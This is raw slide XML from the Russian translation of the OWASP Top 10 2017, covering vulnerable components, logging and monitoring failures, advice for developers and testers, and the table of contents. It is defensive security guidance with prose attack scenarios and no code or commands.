            <a:endParaRPr lang="ru-RU" dirty="0"/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уязвимо, если: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вы не знаете версии всех используемых (на стороне клиента и на стороне сервера) компонентов. Сюда относятся сами компоненты и встроенные зависимости;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 содержит уязвимости, не поддерживается или устарело. Сюда относятся ОС, веб-серверы, серверы приложений, СУБД, приложения, API, а также все компоненты, среды исполнения и библиотеки;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поиск уязвимостей выполняется нерегулярно, а также отсутствует подписка на бюллетени по безопасности используемых компонентов;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своевременно не устанавливаются исправления или обновления для используемых платформ,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фреймворков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зависимостей. Обычно такое происходит, когда наличие обновлений проверяется раз в месяц или квартал, в результате чего организации неделями или месяцами не устраняют исправленные уязвимости;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разработчики ПО не тестируют совместимость обновленных или исправленных библиотек;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обеспечивается безопасность компонентов (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="75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 action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Некорректные параметры безопасности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  <a:br>
              <a:rPr lang="ru-RU" sz="750" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="750" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea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Стандарт подтверждения безопасности приложений OWASP: V1 Архитектура, разработка и моделирование угроз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Проверки зависимостей OWASP (для библиотек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Java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 и .NET)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Руководство OWASP по тестированию: Установление взаимосвязей в архитектуре приложения (OTG-INFO-010)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Рекомендации OWASP по использованию виртуальных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патчей</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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2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Унылая реальность небезопасных библиотек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Поиск уязвимостей (CVE) MITRE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Национальная база данных уязвимостей (NVD)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Retire.js для обнаружения известных уязвимых библиотек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JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="77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6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Бюллетени по безопасности библиотек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Node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7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Инструменты и база данных бюллетеней по безопасности библиотек </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1"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Ruby</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId1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Необходимо реализовать процесс управления обновлениями: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удалите неиспользуемые зависимости, а также лишние функции, компоненты, файлы и сведения из документации;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регулярно проверяйте актуальность версий клиентских и серверных компонентов (например, фреймворков и библиотек), а также их зависимостей, используя такие инструменты, как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versions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 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DependencyCheck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retire.js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Следите за новостями об уязвимостях на соответствующих ресурсах, таких как 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CVE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и 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NVD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Используйте инструменты анализа состава ПО для автоматизации процесса. Подпишитесь на рассылки об уязвимостях, относящихся к используемым вами компонентам;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загружайте компоненты из официальных источников по безопасным ссылкам. Отдавайте предпочтение подписанным пакетам для снижения риска установки измененного или вредоносного компонента;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следите за библиотеками и компонентами, которые не поддерживаются или не получают обновлений безопасности. Если обновление невозможно, попробуйте использовать виртуальные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патчи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обнаружения или предотвращения эксплуатации известных уязвимостей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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Каждая организация должна обеспечить отслеживание,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приоритизацию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применение обновлений или изменений в конфигурации на протяжении всего жизненного цикла приложения или линейки приложений.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="750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A9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Использование компонентов с известными уязвимостями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7697"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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Распространенность: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Несмотря на простоту поиска уже готовых </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="77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эксплойтов</a:t>
                      </a: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для большинства известных уязвимостей, некоторые из них требуют создания специальных средств для их эксплуатации.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Данная уязвимость является очень распространенной. Шаблоны для разработчиков, содержащие большое количество компонентов, могут привести к непониманию того, какие компоненты  реально используются в приложении или API. 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Некоторые сканеры, такие как retire.js, могут помочь с обнаружением уязвимостей, но определение сложности их эксплуатации потребует дополнительных усилий.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7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Несмотря на то, что не все уязвимости приводят к серьезным последствиям, причиной некоторых масштабных взломов стали именно компоненты, содержащие известные уязвимости. В зависимости от защищаемых активов подобная угроза может оказаться на вершине вашего списка.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36385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78750" y="102160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13965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99230" y="117610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8780" y="151166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40" y="1505194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879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Форум открытого проекта, используемый небольшой командой, был взломан через уязвимость в его ПО. Злоумышленники удалили внутренний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репозиторий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содержащий следующую версию продукта, а также все содержимое форума. Несмотря на возможность восстановления источника, отсутствие мониторинга,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журналирования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оповещений привело к более серьезным последствиям. Из-за инцидента программный проект с форума более не развивается.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Злоумышленник может использовать один стандартный пароль для проверки доступа ко всем учетным записям, к некоторым из них он может подойти. Для остальных будет зарегистрирована лишь неудачная попытка входа. Через несколько дней попытка может повториться, но уже с другим паролем.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В крупной торговой сети имеется песочница для внутреннего анализа вредоносных вложений. Средства песочницы обнаружили потенциально вредоносное ПО, но никто не обращал внимания на получаемые от песочницы предупреждения, пока взлом не обнаружили в связи с мошенническими транзакциями по банковским картам от стороннего банка.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Недостатки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="78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журналирования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обнаружения атак, мониторинга и реагирования на инциденты выявляются постоянно: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подвергаемые аудиту события, такие как удачные и неудачные попытки входа в систему, а также важные транзакции, не регистрируются;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предупреждения и ошибки не регистрируются или регистрируются некорректно;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журналы приложений и API не проверяются на предмет подозрительной активности;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журналы хранятся только локально;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пороговые значения предупреждений и схемы реагирования на инциденты отсутствуют или являются неэффективными;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="78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тестирование на проникновение и сканирование инструментами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DAST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(например,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OWASP ZAP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не выдают предупреждений;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не может определять, реагировать или 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предупреждать об атаках в реальном или почти реальном времени.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 системе имеется утечка данных, если журналы регистрации и предупреждения доступны пользователям или атакующим (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="7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 action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Разглашение конфиденциальных данных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Проактивная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защита OWASP: Реализация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журналирования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и обнаружения вторжений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u="sng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Стандарт подтверждения безопасности приложений OWASP: V8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng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Журналирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng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 и мониторинг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Руководство OWASP по тестированию: Подробные коды ошибок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Журналирование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9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800"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CWE-223: Отсутствие регистрации или отображения данных, относящихся к безопасности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CWE-778: Некорректное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журналирование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1"/>
            </a:endParaRPr>
          </a:p>
          <a:p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Исходя из значимости данных, хранимых или обрабатываемых приложением, необходимо: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регистрировать все ошибки входа, доступа и проверки данных на стороне сервера с указанием контекста, достаточного для выявления подозрительных или вредоносных действий, а также хранить их для последующего анализа;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</a:rPr>
              <a:t>регистрировать события в формате, наиболее подходящем для обработки централизованной службой </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>журналирования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</a:rPr>
              <a:t>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контроль целостности журналов аудита важных транзакций для предотвращения подмены или удаления данных, например с помощью доступных только для добавления таблиц БД;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эффективные системы мониторинга и предупреждения для своевременного обнаружения подозрительных действий и реагирования на них;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разработать или утвердить руководство по реагированию на инциденты и устранению их последствий, такое как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NIST 800-61 rev2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Существуют коммерческие и бесплатные системы защиты приложений (например,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OWASP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AppSensor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), межсетевые экраны веб-приложений (например,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ModSecurity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 с набором основных правил OWASP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ModSecurity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), а также программы корреляции журналов с настраиваемыми панелями и предупреждениями. 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A10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Недостатки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> и мониторинга</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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11354"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="219851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эксплуатации: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Распространенность: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900" b="1" i="0" u="none" strike="noStrike" baseline="0" dirty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обнаружения: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Технические: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Эксплуатация недостатков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мониторинга лежит в основе почти всех крупных взломов.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При проведении атак злоумышленники полагаются на отсутствие контроля и своевременного реагирования на инциденты.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Данная уязвимость включена в Топ-10 по результатам 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отраслевых исследований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 </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr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Одним из способов определить качество мониторинга является анализ журналов после проведения теста на проникновение. Для определения возможного ущерба все действия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тестировщиков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должны регистрироваться соответствующим образом.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Большинство атак начинаются с анализа уязвимостей. Возможность проведения подобного анализа повышает вероятность удачной эксплуатации уязвимости практически до 100%.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>
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>В 2016 году обнаружение факта проникновения занимало </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>в среднем 191 день</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> — нанесенный за это время ущерб мог быть огромным.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6385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80170" y="106161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01250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45655" y="118614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55880" y="1496045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40" y="1516242"/>
            <a:ext cx="990600" cy="390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70637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8147362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</a:rPr>
                        <a:t>Разработайте и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>применяйте воспроизводимые методы </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>и стандарты обеспечения безопасности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82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</a:rPr>
                        <a:t>Для новичков, а также специалистов, уже хорошо знакомых с проблемами безопасности веб-приложений, создание безопасного веб-приложения или устранение уязвимостей в уже существующем может оказаться непростой задачей. При работе с большим набором приложений задача может показаться невыполнимой.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</a:rPr>
                        <a:t>Чтобы помочь организациям и разработчикам экономически эффективно уменьшить риски, связанные с безопасностью приложений, OWASP создал множество </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>бесплатных и общедоступных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</a:rPr>
                        <a:t> ресурсов. Ниже представлены некоторые решения OWASP, позволяющие организациям создавать безопасные веб-приложения и API. На следующей странице представлены дополнительные ресурсы OWASP, предназначенные для проверки безопасности приложений и API.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aseline="0" dirty="0"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Существует множество дополнительных ресурсов OWASP. Посетите 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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>страницу проектов OWASP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, где на вкладке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Project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Inventory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перечислены проекты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Flagship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,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Labs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и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Incubator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. Большинство ресурсов OWASP доступны на нашей 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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Вики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, а также многие документы OWASP можно заказать в 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hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>бумажном или электронном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виде.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-914400" y="2895600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2895600"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2895600"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="2932906"/>
              <a:ext cx="5608321" cy="893413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Чтобы создать </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" u="sng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безопасное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веб-приложение, необходимо сначала разработать требования к его безопасности. Для этих целей рекомендуется использовать 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7"/>
                </a:rPr>
                <a:t>Стандарт подтверждения безопасности приложений OWASP (ASVS)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При аутсорсинге используйте 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8"/>
                </a:rPr>
                <a:t>Приложение по безопасности к Контракту на разработку ПО от OWASP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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" b="1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Примечание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: приложение применимо к договорному праву США, проконсультируйтесь с юристом перед его использованием. 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192845" y="2932907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133034" y="4009060"/>
              <a:ext cx="5608321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Вместо добавления механизмов обеспечения безопасности в готовые приложения и API экономически выгоднее встраивать их на этапе разработки. В качестве руководства при разработке безопасного приложения с нуля рекомендуется использовать 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9"/>
                </a:rPr>
                <a:t>Памятки OWASP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143635" y="3942369"/>
              <a:ext cx="98939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Архитектура </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="8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безопасности</a:t>
              </a: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приложения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33034" y="4990881"/>
              <a:ext cx="5608321" cy="845123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Сложно создать надежные и практичные средства обеспечения безопасности. Использование стандартных средств значительно упрощает разработку безопасных приложений и API. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="90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0"/>
                </a:rPr>
                <a:t>Проактивная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0"/>
                </a:rPr>
                <a:t> защита OWASP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является хорошим пособием для разработчиков, более того, сейчас многие </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="90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фреймворки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предоставляют стандартные средства контроля безопасности авторизации, защиты от межсайтовой подмены запросов и т. п.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142435" y="4962145"/>
              <a:ext cx="990600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Стандартные средства обеспечения безопасности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33034" y="6038296"/>
              <a:ext cx="5608321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Для усовершенствования процесса создания приложений и API рекомендуется использовать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1"/>
                </a:rPr>
                <a:t>Модель обеспечения безопасности ПО (SAMM) от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которая позволяет разработать и реализовать методику обеспечения безопасности ПО, подходящую для конкретной организации. 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92845" y="5979462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33034" y="7052915"/>
              <a:ext cx="5608321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2"/>
                </a:rPr>
                <a:t>Образовательный проект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предоставляет материалы для обучения разработчиков безопасности веб-приложений. Для практических занятий используйте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3"/>
                </a:rPr>
                <a:t>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3"/>
                </a:rPr>
                <a:t>WebGoat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4"/>
                </a:rPr>
                <a:t>WebGoat.NET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NodeJS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Goat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Juice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Shop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или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7"/>
                </a:rPr>
                <a:t>уязвимые веб-приложения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Чтобы оставаться в курсе, посещайте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8"/>
                </a:rPr>
                <a:t>Конференции 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8"/>
                </a:rPr>
                <a:t>AppSec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тренинги или собрания региональных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9"/>
                </a:rPr>
                <a:t>отделений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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                  <a:latin typeface="Exo 2" panose="000005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142434" y="6996761"/>
              <a:ext cx="990601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Обучение </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="8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безопасности </a:t>
              </a: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приложений</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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+Р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Что делать разработчикам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2D53-D1BD-49D9-B2FA-F52853EFCB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="3119064"/>
            <a:ext cx="10344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>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Требования к безопасности приложения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040FE-B986-4469-A5F9-41A759396C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116645" y="6127882"/>
            <a:ext cx="1073874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9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Жизненный цикл безопасной разработки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28240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3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Внедрите постоянное тестирования безопасности приложений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Написать безопасный код — важно, но еще важнее подтвердить правильность реализации и использования разработанных средств защиты. Тестирование безопасности приложения проводится как раз для этих целей. Задача эта сложная и комплексная. Современные методы разработки, такие как </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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Agile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95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DevOps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, оказывают сильное влияние на традиционные подходы и средства, поэтому мы настоятельно рекомендуем определить статус компонентов ваших приложений и подобрать эффективные методы работы с ними.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Современные угрозы быстро эволюционируют, поэтому одного сканирования или </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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пентеста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приложений в год уже недостаточно. Современная разработка требует тестирования безопасности в течение всего цикла разработки. Попробуйте улучшить процесс через автоматизацию безопасности. Необходимо также учесть ежегодные расходы на тестирование, экспресс-анализ, исправление, повторное тестирование и развертывание приложения, помноженные на количество поддерживаемых приложений.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+Т</a:t>
            </a:r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делать тестировщикам</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-876300" y="3124200"/>
            <a:ext cx="8670785" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="219293" y="3150429"/>
            <a:ext cx="6479598" cy="4960107"/>
            <a:chOff x="219293" y="3150429"/>
            <a:chExt cx="6479598" cy="4960107"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="3223041"/>
              <a:ext cx="5549303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Перед началом тестирования убедитесь, что правильно расставили приоритеты, исходя из модели угроз. Если у вас нет модели, ее необходимо разработать. Используйте для этого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4"/>
                </a:rPr>
                <a:t>Стандарт подтверждения безопасности приложений (ASVS)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и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5"/>
                </a:rPr>
                <a:t>Руководство по тестированию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от OWASP. Не полагайтесь на инструменты вендоров для определения значимых компонентов вашего бизнеса. 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219293" y="3150429"/>
              <a:ext cx="930295" cy="891759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kern="1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149588" y="4237660"/>
              <a:ext cx="5549303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Подход к тестированию безопасности приложения должен соответствовать команде, процессам и инструментам, используемым в течение жизненного цикла разработки ПО. Использование дополнительных шагов, этапов и проверок может привести к разногласиям, попыткам их обхода и нежеланию масштабироваться. Ищите подходящие способы сбора данных о безопасности и внедрения их в ваши процессы.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219293" y="4171188"/>
              <a:ext cx="930295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49588" y="5215186"/>
              <a:ext cx="5549303" cy="849786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Выберите самый простой, быстрый и точный способ проверки каждого требования. Используйте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6"/>
                </a:rPr>
                <a:t>Фреймворк знаний по безопасности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и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4"/>
                </a:rPr>
                <a:t>Стандарт подтверждения безопасности приложений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от OWASP для определения функциональных и нефункциональных требований к безопасности, а также проведения комплексных испытаний. Не забывайте про специалистов, которые будут заниматься ложными срабатываниями или </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="95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несрабатываниями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автоматических инструментов.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219293" y="5196300"/>
              <a:ext cx="936524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50" b="1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Стратегии тестирования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49588" y="6266896"/>
              <a:ext cx="5549303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Необязательно начинать тестировать все подряд. Начните с самого важного и постепенно расширяйте программу проверок, т. е. увеличивайте количество автоматических проверок безопасности и уязвимостей, а также количество проверяемых приложений и API. Цель — достичь состояния, когда основные параметры безопасности всех приложений и API проверяются непрерывно.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25522" y="6205362"/>
              <a:ext cx="930295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50" b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Охват и точность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49588" y="7227295"/>
              <a:ext cx="5549303" cy="852486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Неважно, насколько хорошо проведено тестирование, если вы не можете грамотно сообщить о результатах. Добейтесь доверия, показав, что вы понимаете принцип работы приложения. Четко, без жаргонизмов, опишите способы и сценарии атак. Оцените реальную сложность обнаружения и эксплуатации уязвимостей, а также серьезность последствий. Наконец, сообщите о результатах исследования средствами, используемыми разработчиками, не в PDF-файлах.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219293" y="7214424"/>
              <a:ext cx="930295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493BA7-5997-4A18-9618-62319A0A692F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214008" y="3340604"/>
            <a:ext cx="9355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Понимание модели угроз</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans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98B84-34A6-4B60-9C0A-BF59F260AF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213103" y="4237660"/>
            <a:ext cx="935580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Понимание жизненного цикла разработки </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="ru-RU" sz="10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endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans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5ED7B-C46B-4C58-9799-5E20D5780F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116995" y="7362310"/>
            <a:ext cx="11517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>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Сообщайте о результатах правильно</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="ru-RU" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B060402020202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32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99090"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="11430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9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Авторские права и лицензирование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Авторские права © 2003—2017, Фонд OWASP.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Документ выпущен под лицензией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Creative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Commons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Attribution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Share-Alike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4.0.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 случае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переиспользования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или распространения данного документа необходимо указывать условия лицензионного соглашения, действующие в его отношении.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="13716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 descr="by-s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 bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8522201"/>
            <a:ext cx="1046163" cy="3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03455"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="3352800" cy="7008415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Содержание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860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill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FF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83600"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7008415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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Об OWASP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2967"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Открытый проект по обеспечению безопасности веб-приложений (OWASP) — это открытое сообщество, позволяющее</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="85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организациям разрабатывать, приобретать и поддерживать безопасные приложения и интерфейсы прикладного программирования (API).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OWASP бесплатно и в открытом доступе предлагает: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стандарты и инструменты для обеспечения безопасности приложений;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полные версии книг по тестированию безопасности приложений, разработке безопасного кода, а также оценке безопасности кода;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презентации и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6"/>
                        </a:rPr>
                        <a:t>видео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7"/>
                        </a:rPr>
                        <a:t>памятки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по большинству распространенных вопросов;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стандартные требования к безопасности и библиотеки;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8"/>
                        </a:rPr>
                        <a:t>локальные отделения по всему миру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передовые исследования;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крупные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9"/>
                        </a:rPr>
                        <a:t>конференции по всему миру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0"/>
                        </a:rPr>
                        <a:t>списки рассылок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b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</a:b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Более подробная информация доступна на сайте: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1"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org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Все инструменты, документы, видео, презентации и отделения OWASP являются бесплатными и открытыми для тех, кто заинтересован в улучшении безопасности приложений.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Фонд выступает за подход к безопасности приложений с точки зрения людей, процессов и технологий, поскольку для наиболее эффективного обеспечения безопасности приложений требуются улучшения во всех этих областях.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OWASP представляет собой новый тип организации. Наша независимость от коммерческого влияния позволяет нам предоставлять беспристрастные, практические и эффективные данные по безопасности приложений.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OWASP не связан ни с одной технологической компанией, хотя поддерживает использование технологий промышленной безопасности. OWASP выпускает большое количество материалов, действуя прозрачно и открыто, а также всегда готов к сотрудничеству.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Фонд OWASP является некоммерческой организацией, что обеспечивает проекту долгосрочный успех. Почти все связанные с OWASP люди являются добровольцами, включая членов совета OWASP, руководителей отделений и проектов, а также участников проекта.</a:t>
                      </a:r>
                      <a:b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</a:b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Мы поддерживаем инновационные исследования в области безопасности, предоставляя гранты и инфраструктуру.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Присоединяйтесь к нам!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 dirty="0"/>
              <a:t>С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  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Содержание</a:t>
            </a:r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7167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="63931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9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Об OWASP	………………………………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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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Предисловие	…………………………….....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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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Введение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.……..…………………………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</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3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ЧН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Что нового ….………………………………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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4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Угрозы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Угрозы безопасности приложений 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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>5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Т10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Топ-10 угроз безопасности приложений</a:t>
                      </a:r>
                      <a:b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– 2017 …..………………………..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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r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A1:2017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Внедрение …..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……………..………………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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>7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A2:2017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Недостатки аутентификации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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8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A3:2017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ru-RU" sz="90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Разглашение конфиденциальных данных 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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>9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A4:2017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Внешние сущности XML (XXE)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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10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A5:2017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Недостатки контроля доступа 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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11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 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A6:2017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Некорректная настройка параметров безопасности .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…………………………………………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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12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A7:2017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Межсайтовое выполнение сценариев (XSS) …………………………………………………….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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13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A8:2017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Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" noProof="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десериализация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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14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A9:2017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Использование компонентов с известными уязвимостями ..…………………………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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15</a:t>
                      </a:r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A10:2017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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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Недостатки журналирования и мониторинга ……………………………………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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…..…..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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
